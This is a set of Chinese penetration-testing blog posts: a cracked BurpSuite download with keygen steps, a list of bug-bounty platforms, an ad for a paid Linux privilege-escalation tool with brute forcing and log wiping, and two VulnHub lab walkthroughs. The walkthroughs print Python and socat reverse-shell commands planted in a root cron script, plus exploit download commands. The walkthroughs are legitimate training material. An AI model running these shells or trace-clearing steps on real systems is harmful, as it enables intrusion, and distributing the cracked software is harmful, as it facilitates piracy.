BurpSuite v2025.6.3汉化版，附激活教程 通过百度网盘分享的文件：burp 2025.6.3https://pan.baidu.com/s/1rdZ_T8vEtgM8bUn8J-HWOg提取码: b9x4网盘里面呢包含了burpsuite的各种历史版本，2021-2025的都有首先我们需要打开这个Start.VBS来获取激活码出来后是这个界面三个都勾选上，第一个必选，第二个是汉化的意思，第三个是自动运行的意思，是随后点击启动（run）之后复制这一段密匙打开burpsuite并粘贴上去这里下一步之后就点击手动激活两个工具结合起来先从burpsuite复制到激活工具，再通过激活工具的激活密匙复制到burpsuite就可以激活成功啦打开使用这样就可以使用啦往期推荐Linux内网渗透（2w字超详细）AD域内网渗透-三种漏洞利用方式【OSCP】vulnerable_docker，三种代理方法打入内网【内网渗透】CobaltStrike与MSF联动互相上线的方式内网渗透必备，microsocks，一个轻量级的socks代理工具【OSCP】 Kioptrix 提权靶机（1-5）全系列教程，Try Harder！绝对干货！DC-2综合渗透，rbash逃逸，git提权，wordpress靶场渗透教程【渗透测试】12种rbash逃逸方式总结红日靶场5，windows内网渗透，社工提权，多种域内横向移动思路红日靶场3，joomla渗透，海德拉SMB爆破，域内5台主机横向移动教学不用MSF？红日靶场4，从外网到域控，手工干永恒之蓝，教科书级渗透教学ATK&CK红日靶场二，Weblogic漏洞利用，域渗透攻略SQL注入中各种WAF的绕过方式，狗，盾，神，锁，宝利用MySQL特性，WAF绕过技巧SQL注入绕过某狗的WAF防火墙，这一篇就够了，6k文案超详细大型翻车现场，十种WAF绕过姿势，仅成功一种喜欢长文吗？1w字图文带你了解sqlmap，从0到1，WAF绕过，高级用法一文通透一个永久的渗透知识库

src平台推荐，挖SRC必须知道的25个漏洞提交平台 TSrchttps://security.tencent.com/腾讯安全应急响应中心（腾讯SRC）是腾讯用于收集漏洞信息的平台。白帽黑客可提交腾讯产品及服务的漏洞，经审核后，腾讯会依漏洞等级给予提交者奖励，通常有现金和荣誉激励。其目的是借助外部力量提升安全防护，共同守护产品安全，为用户提供健康网络环境。补天https://www.butian.net/补天漏洞响应平台旨在建立企业与白帽子之间的桥梁，帮助企业建立SRC(安全应急响应中心)，让企业更安全，让白帽子获益。360srchttps://security.360.cn/360SRC，360安全应急响应中心，白帽子的提款机。挖洞交票，等级越高赏金越香，上不封顶。别墨迹，干就完了。360众测https://zhongce.360.net/360众测，干就完了！ 这是360自家的高赏金战场，漏洞=现金。58srchttps://security.58.com/58SRC，58同城的漏洞回收站，白帽子进来捡钱。 挖到漏洞甩链接，评级快、打款更快，高危直接秒付。 每月冲榜，前几名额外加码，公开排名，实名装X。 技术够野，钱包就鼓；58SRC，干就完了。DayDayPochttps://www.ddpoc.com/DayDayPoc——白帽子的“军火库”，每日投喂新鲜0day/1day PoC，GitHub日更，关注它，今天不熬夜挖洞，明天熬夜补洞。Seebughttps://www.seebug.org/Seebug，老牌漏洞军火库，PoC/Exp 日更，一键搜索、直接开捅，会员还能提前嫖 0day。洞不等人，上车就射。vivoSrchttps://security.vivo.com.cn/#/rank/listvivoSRC——vivo官方撒钱场，漏洞换赏金，高危立结，上不封顶。每月冲榜，前10直接加钱加戏。别磨叽，干洞就完了。京东srchttps://security.jd.com/#/index京东SRC，东哥的红包局——漏洞=现金，高危秒付，上不封顶；季度冲榜、实物金条、公开封神。技术够硬，钱包就肿，干！华为srchttps://bugbounty.huawei.com/#/home华为SRC，菊厂赏金猎场。技术够野，钱包就鼓；干华为，没废话。国家信息安全漏洞共享平台https://www.cnvd.org.cn/CNVD，国家队漏洞库，官方唯一指定“白名单”通道。 提交原创漏洞=拿编号、上通告、领证书； 党政机关、国央企、关基单位优先收录； 想混国家级荣誉、拿护网加分、评职称，就冲它。 洞不狠别来，来了就名垂“国史”。国家信息安全漏洞库https://www.cnnvd.org.cn/home/childHome想混国家级光环，先把洞磨成刺刀再来。字节跳动srchttps://src.bytedance.com/home字节SRC，宇宙厂撒币现场。技术够骚，钱包就爆；冲字节，别怂。小米srchttps://sec.xiaomi.com/#/小米SRC，雷军的红包雨。技术够刚，直接提车！平安srchttps://security.pingan.com/平安集团的漏洞收集平台，金融行业顶尖的SRC之一。白帽子可提交平安旗下银行、证券、保险等业务系统的漏洞，漏洞评级清晰，奖励丰厚，高危漏洞直接到账，月度榜单前五额外加码，季度榜一送理财金，是金融安全领域的“现金奶牛”。漏洞盒子https://www.vulbox.com/综合性众测平台，覆盖众多行业。漏洞盒子提供丰富的众测项目，从互联网企业到传统行业都有涉及。平台奖励机制灵活，除了现金奖励外，还有积分兑换实物奖品等福利。漏洞盒子注重漏洞的挖掘和修复闭环管理，是白帽子练手和赚取收益的好去处。edusrchttps://src.sjtu.edu.cn/面向教育行业的SRC平台，专注于高校、教育机构的信息安全。白帽子可以提交教育系统、在线学习平台等的漏洞。EduSRC注重安全教育和人才培养，除了奖励机制外，还提供安全培训和交流机会，帮助白帽子提升技术水平，是教育安全领域的“知识宝库”。斗鱼srchttps://security.douyu.com/#/welcome斗鱼直播的安全众测平台，聚焦直播和游戏领域。白帽子可以提交斗鱼直播平台、游戏相关系统的漏洞。斗鱼SRC奖励及时，高危漏洞快速审核和支付。平台还设有季度榜单，上榜者可获得额外奖励和荣誉，是直播行业安全的“守护者”。SSRChttps://security.sangfor.com.cn/360的安全应急响应中心，是网络安全领域的老牌SRC。白帽子可以提交360旗下各类产品的漏洞，包括浏览器、杀毒软件、智能家居等。360SRC以高赏金和快速响应著称，漏洞提交后审核迅速，奖励丰厚。平台还定期举办安全活动，吸引众多白帽子参与，是网络安全的“重镇”。火线安全平台https://www.huoxian.cn/testin火线安全平台是一个新兴的众测平台，专注于互联网和新兴技术领域的漏洞挖掘。平台提供多样化的众测项目，涵盖人工智能、大数据、云计算等领域。火线安全注重技术创新和安全研究，为白帽子提供前沿的技术交流机会和丰厚的奖励，是新兴安全领域的“新星”。百度srchttps://bsrc.baidu.com/views/main/index.html#home百度的安全众测平台，覆盖百度旗下众多产品和服务。白帽子可以提交百度搜索引擎、百度云、百度地图等的漏洞。百度SRC奖励机制完善，高危漏洞直接到账，月度榜单有额外奖励。平台还提供安全技术分享和交流机会，是互联网安全领域的“技术高地”。美团srchttps://security.meituan.com/#/home美团的安全众测平台，聚焦美团外卖、美团点评等业务。白帽子可以提交美团相关系统的漏洞。美团SRC注重漏洞的快速修复和奖励的及时发放，高危漏洞快速审核和支付。平台还设有季度榜单，上榜者可获得额外奖励和荣誉，是生活服务领域安全的“守护者”。荣耀srchttps://security.honor.com/src/#/home荣耀手机的安全众测平台，专注于荣耀手机及相关生态产品的漏洞收集。白帽子可以提交荣耀手机系统、荣耀IoT设备等的漏洞。荣耀SRC奖励丰厚，高危漏洞快速审核和支付，月度榜单有额外奖励。平台还提供与荣耀安全团队直接交流的机会，是智能设备安全的“护盾”。顺丰srchttps://sfsrc.sf-express.com/home顺丰的安全众测平台，聚焦顺丰快递、物流系统等业务。白帽子可以提交顺丰相关系统的漏洞。顺丰SRC注重漏洞的快速修复和奖励的及时发放，高危漏洞快速审核和支付。平台还设有季度榜单，上榜者可获得额外奖励和荣誉，是物流行业安全的“防线”。广告时间-----⬇⬇⬇⬇⬇⬇⬇⬇⬇⬇⬇⬇⬇-----➡➡一个永久的渗透知识库，欢迎您的加入⬅⬅-----⬆⬆⬆⬆⬆⬆⬆⬆⬆⬆⬆⬆⬆-----往期推荐Linux内网渗透（2w字超详细）AD域内网渗透-三种漏洞利用方式【OSCP】vulnerable_docker，三种代理方法打入内网【内网渗透】CobaltStrike与MSF联动互相上线的方式内网渗透必备，microsocks，一个轻量级的socks代理工具【OSCP】 Kioptrix 提权靶机（1-5）全系列教程，Try Harder！绝对干货！DC-2综合渗透，rbash逃逸，git提权，wordpress靶场渗透教程【渗透测试】12种rbash逃逸方式总结红日靶场5，windows内网渗透，社工提权，多种域内横向移动思路红日靶场3，joomla渗透，海德拉SMB爆破，域内5台主机横向移动教学不用MSF？红日靶场4，从外网到域控，手工干永恒之蓝，教科书级渗透教学ATK&CK红日靶场二，Weblogic漏洞利用，域渗透攻略SQL注入中各种WAF的绕过方式，狗，盾，神，锁，宝利用MySQL特性，WAF绕过技巧SQL注入绕过某狗的WAF防火墙，这一篇就够了，6k文案超详细大型翻车现场，十种WAF绕过姿势，仅成功一种喜欢长文吗？1w字图文带你了解sqlmap，从0到1，WAF绕过，高级用法一文通透一个永久的渗透知识库

FeatherScan v4.0 - 适用于Linux的全自动内网信息收集工具 前言在平时渗透打靶的时候，经常要自己手工输入命令，做各种基本的信息收集，非常的繁琐，所以自研了一款工具，这款工具没有接入AI，因为不合适，接入了AI的话在一些不能上网的环境下进行信息收集，权限提升的分析，会非常的不方便，这款工具全都在目标机器本地执行（执行速度快，提高渗透测试效率），类似于fscan，需要上传到目标靶机上，后期会增加离线的POC和漏洞库对Linux系统进行全面的信息收集，和特权提升检测，获取方式见文末PS：如果有提权需要可以将这些收集到的信息，全部复制给AI分析就可以了，比如Venice Uncensored另外这个工具采用并行的执行方式，而不是同步执行，这样的话会显著提升脚本的执行速度，不然光一个IP内网扫描，你都够吃一顿肯德基了没有完美的工具，人也是，不可能做到人人都喜欢，不喜欢或者觉得垃圾，勿喷，您完全有使用别的工具的权力，比如开源的LinPEAS、LinEnum、Bashark等等，但都是英文的，有些师傅们可能看不懂，我也看不懂，可能是我没有文化吧，要手动去翻译很麻烦，而我这个是专为国人打造的Linux自动化内网信息收集工具。如果哪里有欠缺或者建议，欢迎师傅们批评和留言。概述FeatherScan是一款专为Linux系统设计的自动化内网渗透与特权提升扫描工具，由泷羽Sec作者白小羽开发。该工具旨在简化渗透测试过程中的内网信息收集和提权检测环节，通过自动化扫描显著减少手工操作时间，帮助安全研究人员高效识别系统弱点。V4.0主要功能1. 全面系统信息收集操作系统与内核信息、用户与组权限分析、环境变量深度检查、网络配置与路由信息、敏感文件权限审计、容器环境检测、服务与进程分析等等简单的内核提权漏洞检测（非常适合用来打靶机学习）2. 内网渗透扫描 主机发现：混合扫描技术（ICMP Ping + ARP分析 + TCP端口扫描），三种网络模式扫描，不忽漏掉每一个内网机器 端口扫描：支持常见服务端口识别 服务识别：自动检测开放服务及版本信息 隐身模式：慢速扫描避免触发IDS/IPS 常见的端口扫描3. 横向移动检测SSH密钥重用检测、密码爆破（SSH, MySQL, PostgreSQL, SMB等）、SMB共享匿名访问检测、数据库服务爆破等等。4. 特权提升检测SUID/SGID危险文件检测、sudo权限深度分析、可写路径检查、内核漏洞匹配（脏牛、脏管道等）、密码哈希分析、自动化漏洞利用（不需要联网）等等5. 安全痕迹管理自动备份/恢复修改文件、安全删除临时文件（7次覆盖）、命令历史清除、日志文件清理、内存缓存清除、本地爆破记录删除技术特点 智能交互式扫描动态启用深度检查、按需开启内网渗透扫描、交互式服务爆破确认等等 混合扫描技术ICMP Ping扫描、ARP缓存分析、TCP端口扫描、服务指纹识别等等 权限提升自动化自动添加特权用户、sudo权限自动化配置、定时任务注入、内核漏洞EXP自动下载等等 安全痕迹管理操作全程跟踪记录、多轮覆盖安全删除、服务专用日志清除等等 使用示例# 基础扫描 chmod +x FeatherScan ./FeatherScan ​ # 启用深度检查+内网扫描 [?] 是否执行深入检查? y [?] 是否执行内网渗透扫描? y [?] 是否启用隐身模式? n输出示例​ ███████╗███████╗ █████╗ ████████╗██╗ ██╗███████╗██████╗ ██╔════╝██╔════╝██╔══██╗╚══██╔══╝██║ ██║██╔════╝██╔══██╗ █████╗ █████╗ ███████║   ██║   ███████║█████╗ ██████╔╝ ██╔══╝ ██╔══╝ ██╔══██║   ██║   ██╔══██║██╔══╝ ██╔══██╗ ██║     ███████╗██║ ██║   ██║   ██║ ██║███████╗██║ ██║ ╚═╝     ╚══════╝╚═╝ ╚═╝   ╚═╝   ╚═╝ ╚═╝╚══════╝╚═╝ ╚═╝ ​       高级Linux特权提升扫描工具     泷羽Sec安全团队 | 白小羽 | v4.0 ​ =================================================== 工具描述 ================================================= 1、Linux内网信息收集，全面收集操作系统/内核版本、环境变量、用户信息等关键数据 2、检测敏感文件权限、容器环境、服务配置等安全风险点,分析历史命令、环境变量、SSH配置等潜在攻击向量 3、智能主机发现（ARP/Ping/TCP混合扫描）,多协议服务爆破（SSH/MySQL/SMB等）,网络路由分析、DNS配置检测和代理设置审查 4、SUID/SGID文件扫描与危险程序识别,内核漏洞数据库匹配（脏牛、脏管道等）,Sudo规则审计与配置弱点分析 5、Docker逃逸路径检测和容器安全评估,隐身扫描模式（避免触发IDS）,自动化痕迹清除机制,敏感信息掩码保护 ​ [-] 系统信息 [+] 当前用户: root [+] 主机名: kali [+] 操作系统: kali GNU/Linux Rolling [+] 内核版本: 6.12.25-amd64 [+] 扫描开始时间: Thu Jul 10 05:42:16 AM EDT 2025 ​ [?] 是否执行深入检查? 普通检查: 快速检测常见提权向量 (SUID, 可写文件, 内核漏洞等) 深入检查: 包括普通检查 + 服务爆破 + 敏感文件深度扫描 [y/N] y [+] 深入检查已启用 ​ [?] 是否执行内网渗透扫描? 内网扫描: 主机发现、端口扫描、横向移动检测 [y/N] n ​ ################ 完整系统信息 ################ ​ [-] 系统信息: 主机名: kali 操作系统: kali GNU/Linux Rolling 内核版本: 6.12.25-amd64 系统架构: x86_64 运行时间: up 3 days, 22 hours, 52 minutes ​ [-] 用户信息: 当前用户: root 用户ID: uid=0(root) gid=0(root) groups=0(root) 特权用户: root test featheruser 。。。。。。。。。。。。。。。。。。。。。。。使用建议 授权测试：仅在获得明确授权的环境中使用 深度扫描：对关键系统启用深入检查模式 痕迹管理：扫描完成后使用内置清理功能 字典定制：根据目标环境定制pass.txt密码字典 2025.7.28 v4.5继上一篇本次也算是一个大更新1、融入了exploit-db离线Linux内核提权漏洞库，联动searchsploit工具，更方便的简化了渗透测试提权的过程2、融入了GTFOBins常用提权命令共50+个，比如常见的find，sh，pkexec，sudo，nmap，vim，less，tcpdump，Docker，zip，tar等等命令进行提权3、新增了常见的CMS敏感配置文件扫描，比如django，wordpress，joomla等等，通常用来查看数据库的账号密码4、新增敏感环境变量提权模块——PATH提权5、新增相关的免责条款，若不接受，则不能使用该工具下面来看看更新了哪些内容吧，首先是免责条款新增GTFOBins 50+命令提权新增内置GTFOBins提权数据库，无需联网，GTFOBins中的大部分提权方法皆可以利用！！并且满足一定的条件才会输出给你，比如suid，sudo，可读/可写等等，不满足任何一个条件，都不会告诉你利用方法（命令使用准确率还在优化）新增提权总结，以及使用方法，和成功率告知新增CMS常用配置文件检测新增敏感环境变量提权—PATH提权提权效果展示以及path提权，也会将提权方法在程序结束前告知新增exploit-db漏洞库新增Linux内核提权漏洞库（基于searchsploit），这里以tr0ll靶机为例子首先我们需要在kali中创建自己的漏洞数据库（使用脚本的好处就是这个漏洞库 exploit-db 也就是searchsploit漏洞库是会更新的，使用命令searchsploit -u更新本地漏洞库），执行generate_vuln_db.sh会生成一个漏洞库的txt文件，主要是筛选Linux提权的漏洞将这个txt文件和FeatherScan同时上传到靶机上，使用FeatherScan就会利用内置强大的版本比较算法，进行检测，执行到最后我们得知漏洞编号之后，在kali中就直接将使用searchsploit -m [编号]复制到当前目录，并使用python开启一个http服务上床到靶机上提权成功！其他细节优化更新了，系统存在bash -p命令提权，但是不出现提权信息问题（因为SUID和SGID同时存在，所以不能使用=4来进行判断）# 靶机 -bash-5.0$ ls /usr/bin/bash -l -rwsr-sr-x 1 root root 1183448 Feb 25  2020 /usr/bin/bash ​ -bash-5.0$ stat -c '%a' "/usr/bin/bash" | cut -c 1 6修改后的执行结果新增手动选择是否尝试进行提权（文件可写的情况下），不然写入会导致一些问题工具获取加入泷羽Sec帮会即可（长期更新中。。。）单独购买不方便获取最新版本，优惠最后两天，错过只能等国庆节了。。。。获取方式加入泷羽Sec内部Freebuf帮会即可获取最新版本，往期版本会不定期在github上进行更新，在帮会主页中找到帮会网盘，即可下载工具啦，这工具没有那么高大上，只是简化了linux内网信息收集，端口扫描，内核漏洞利用，内网探测，痕迹清除等等，理性消费加入方式扫码即可更多福利点击查看https://mp.weixin.qq.com/s/ROMh7U4xj9nXqlKzBFd2WATips：一天存10块，一个月就是3000，一年就是36w，十年就是3600w，3600w可以干什么？上海一套别墅，记得买个带独立机房的，防震防溯源！一个稳定的家庭，给爸妈在老家盖栋最气派的养老别墅，请最好的管家和医护，医护团队人均CISSP+OSEP，至少也是OSCP。一台迈巴赫s680，车窗贴膜要用防弹级的，毕竟可能装满了0day漏洞报告！打工？还打什么工？老板？哪个老板？10年后你自己就是董事长！所以从现在开始养成一个好习惯，只要10年，从此只挖洞不上班，甲方需求全拉黑，开源项目随便PR！看到这里，您觉得这79块钱还贵吗？不过只是您的冰山一角，少买一个吃灰的云服务器，也就您吃的一顿科技料理的外卖，够我吃10顿。从现在开始投资自己吧。10年之后咱们顶峰相见、、、、、、那时候如果您还觉得贵，请开着您的迈巴赫来嘲讽我这个弱智，我将毫无怨言免责声明FeatherScan仅限合法安全审计和授权渗透测试使用。使用者应遵守当地法律法规，未经授权使用本工具造成的任何后果由使用者自行承担。文章首发于：https://longyusec.com/longyushoulu/450/泷羽Sec安全团队 | 白小羽 | 2025往期推荐Linux内网渗透（2w字超详细）AD域内网渗透-三种漏洞利用方式【OSCP】vulnerable_Docker，三种代理方法打入内网【内网渗透】CobaltStrike与MSF联动互相上线的方式内网渗透必备，microsocks，一个轻量级的socks代理工具【OSCP】 Kioptrix 提权靶机（1-5）全系列教程，Try Harder！绝对干货！DC-2综合渗透，rbash逃逸，git提权，wordpress靶场渗透教程【渗透测试】12种rbash逃逸方式总结红日靶场5，windows内网渗透，社工提权，多种域内横向移动思路红日靶场3，joomla渗透，海德拉SMB爆破，域内5台主机横向移动教学不用MSF？红日靶场4，从外网到域控，手工干永恒之蓝，教科书级渗透教学ATK&CK红日靶场二，Weblogic漏洞利用，域渗透攻略SQL注入中各种WAF的绕过方式，狗，盾，神，锁，宝利用MySQL特性，WAF绕过技巧SQL注入绕过某狗的WAF防火墙，这一篇就够了，6k文案超详细大型翻车现场，十种WAF绕过姿势，仅成功一种喜欢长文吗？1w字图文带你了解sqlmap，从0到1，WAF绕过，高级用法一文通透一个永久的渗透知识库

sar靶机，suid计划任务提权 下载地址：https://www.vulnhub.com/entry/sar-1,425/首先是利用arp-scan进行主机发现其次是使用map对其进行端口扫描目录扫描一个cms，并且网站标题中已经泄露了版本信息我们检索cms漏洞将这个exp复制到本地反弹shellexport RHOST="10.10.10.128";export RPORT=1234;python3 -c 'import sys,socket,os,pty;s=socket.socket();s.connect((os.getenv("RHOST"),int(os.getenv("RPORT"))));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("/bin/bash")'# 或者socat TCP:10.10.10.1:8888 EXEC:/bin/bash创建交互式终端python3 -c 'import pty;pty.spawn("/bin/bash")'然后内网信息收集一堆操作，参考：https://mp.weixin.qq.com/s/B4Lc6gLNU0PuToGjrlngOA看到计划任务中包含了一个root文件每过5分钟执行一次cat /etc/crontabwww-data@sar:/var/www/html$ cat finally.shcat finally.sh#!/bin/sh​./write.shwww-data@sar:/var/www/html$ cat write.shcat write.sh#!/bin/sh​touch /tmp/gatewaywww-data@sar:/var/www/html$ ls -lls -ltotal 32-rwxr-xr-x 1 root root 22 Oct 20 2019 finally.sh-rw-r--r-- 1 www-data www-data 10918 Oct 20 2019 index.html-rw-r--r-- 1 www-data www-data 21 Oct 20 2019 phpinfo.php-rw-r--r-- 1 root root 9 Oct 21 2019 robots.txtdrwxr-xr-x 4 www-data www-data 4096 Oct 20 2019 sar2HTML-rwxrwxrwx 1 www-data www-data 30 Oct 21 2019 write.shwww-data@sar:/var/www/html$ echo 'export RHOST="10.10.10.128";export RPORT=1234;python3 -c 'import sys,socket,os,pty;s=socket.socket();s.connect((os.getenv("RHOST"),int(os.getenv("RPORT"))));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("/bin/bash")'' >> write.sh<fd in (0,1,2)];pty.spawn("/bin/bash")'' >> write.shbash: syntax error near unexpected token `('www-data@sar:/var/www/html$ cat write.shcat write.sh#!/bin/sh​touch /tmp/gatewaywww-data@sar:/var/www/html$ lslsfinally.sh index.html phpinfo.php robots.txt sar2HTML write.shwww-data@sar:/var/www/html$ echo 'socat TCP:10.10.10.1:8888 EXEC:/bin/bash' >> write.sh<cat TCP:10.10.10.1:8888 EXEC:/bin/bash' >> write.shwww-data@sar:/var/www/html$ cat write.shcat write.sh#!/bin/sh​touch /tmp/gatewaysocat TCP:10.10.10.1:8888 EXEC:/bin/bashwww-data@sar:/var/www/html$随后等待5分钟即可，本次靶机主要是利用计划任务提权 

W34KN3SS，通过openssl漏洞公匙获取私匙 下载地址：https://www.vulnhub.com/entry/w34kn3ss-1,270/使用nmap进行端口扫描将这个域名，追加到hosts（本机也要追加C:\Windows\System32\drivers\etc\hosts）这个靶机中是有两个web的，一个web是用ip访问的一个web是用域名访问的，所以也需要注意，仔细观察这个n30可能是一个有用的信息目录扫描出来的一个结果，包含了一个公匙和一个版本文件查看公匙文件这个提示信息，表示的是刚刚那个.pub文件是由openssl 0.9.8c-1生成的使用searchsploit检索漏洞库我们查看第一个txt漏洞描述根据他的描述，我们下载这个文件wget https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/5622.tar.bz2tar -jxvf 5622.tar.bz2开始对比公匙和密匙，将root@targetcluster前面的东西拿出来进行对比尝试直接登录目录靶机，用户名是什么呢？目前得知的结果就是刚开始找到的那个n30，只能使用这个进行测试了ssh -i rsa/2048/4161de56829de2fe64b9055711f531c1-2537 n30@weakness.jth用最近爆出来CVE-2025-32463试试提权相关的学习文章：https://www.freebuf.com/articles/vuls/437488.htmlgit clone https://github.com/pr0v3rbs/CVE-2025-32463_chwoot.gitzip -r exp.zip CVE-2025-32463_chwoot本来想要使用最新的提权漏洞的，但是这里没有Docker命令，就利用不了了完整使用方法（仅作介绍）# 2 – build and run Docker image (tagged "sudo-chwoot")$ ./run.sh​# 3 – run exploit in container (drops you into a root shell)pwn@0da3726bd81f:~$ ./sudo-chwoot.shwoot!root@0da3726bd81f:/# iduid=0(root) gid=0(root) groups=0(root),1001(pwn)继续信息收集（搜集了一圈也没有什么可以利用的），只有这个code这个可执行文件我们并不知道是什么，执行file命令查看文件类型属于py文件我们找到网上在线pyc反编译工具，放入进行反编译后查看内容（在放入反编译前要先将code文件改成code.pyc文件）https://tool.lu/pyc/得到n30用户的密码dMASDNB!!#B!#!#33至此靶机完成